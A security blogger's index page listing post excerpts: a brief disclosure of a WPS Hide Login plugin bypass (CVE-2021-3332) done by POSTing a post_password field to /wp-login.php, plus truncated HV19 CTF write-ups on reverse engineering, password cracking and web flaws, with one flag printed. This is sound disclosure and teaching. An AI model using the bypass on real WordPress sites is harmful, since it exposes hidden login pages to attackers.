Sebastian's Blog

software developer. security enthusiast.

WPS Hide Login 1.6.1 Protection Bypass (CVE-2021-3332)

The protective feature of WPS Hide Login can be bypassed by sending a crafted POST request containg the field post_password towards the default WordPress login url /wp-login.php. In file /classes/plugin.php on line 494 the plugin explicitly checks for the absence of this POST field but no else-case is defined.

HV19.24 ham radio

I haven’t solved this during the contest, but I want to share my solution. The zip file contained a binary file named brcmfmac43430-sdio.bin; which is a Broadcom 43430 SDIO firmware. After some time poking around using ghidra I found a base64 encoded string Um9zZXMgYXJlIHJlZCwgVmlvbGV0cyBhcmUgYmx1ZSwgRHJTY2hvdHRreSBsb3ZlcyBob29raW5nIGlvY3Rscywgd2h5IHNob3VsZG4ndCB5b3U/ which decodes to Roses are red, Violets are blue, DrSchottky loves […]

HV19.23 Internet Data Archive

The page asks for a username and files to be downloaded. Dowloading the flag is not allowed. Submitting the form leads to another page with a download link and the password for the generated zip file. The generated files are all stored within the /tmp folder. Apache allows indexes on this folder so sorting the […]

HV19.22 The command … is lost

The attached file turned out to be an intel hex file containing some kind of an arduino program or something. Loading the file in ghidra and poking around showed some methods which seem to just swap around variables. I recreated this behaviour in python and got the flag. The flag is HV19{H3y_Sl3dg3_m33t_m3_at_th3_n3xt_c0rn3r}.

HV19.21 Happy Christmas 256

The information provided was pretty helpful. Ten years ago (2009) there was a big password leak, known as rockyou. As his password is 16 characters long we have to check every 16 characters password from the rockyou wordlist. As santa uses NIST-P256 with the SHA256 hash of the password as key, we can simply hash […]

HV19.20 i want to play a game

The attached zip file contains a binary named game. Using ghidra to analyze the file showed, that this is some PS4 executable. The code opens a file /mnt/usb0/PS4UPDATE.PUP, validates the md5 hash and xors some content of the file with a key contained in the executable. As ghidra was unable to properly resolve references, it […]

HV19.19 🎅

I immediately recognized this as emojiCode. The EmojiCode debugger has an option to prettify the code, which helped a lot. As the documentation isn’t that good, I had to google for most of the emojis to find out what’s going on. Basically, the program takes some user input. Then it runs over an existing string, […]

HV19.18 Dance with me

The attached zip file contained a binary called dance which is an actual iOS binary. It will ask you for some input and will return the flag. After looking at the crypto implementation I thought that this could be the Salsa20 cipher – which would also fit the name. Analysing the main function and the […]

HV19.17 Unicode Portal

After registering and logging in, I got a page showing different Unicode characters and their different representations. The website also allows to view some part of the source code: The registerUser function actually updates a users password (INSERT INTO … ON DUPLICATE KEY UPDATE password=) if we register with an existing username. But we only […]

HV19.16 B0rked Calculator

After poking around with ghidra I found the part which checks the input and calls the responsible math function (which are all nop). I used ghidras rename feature to rename these functions. Searching for references to this functions shows, that there are also called in another part of the program. The part calculates some string […]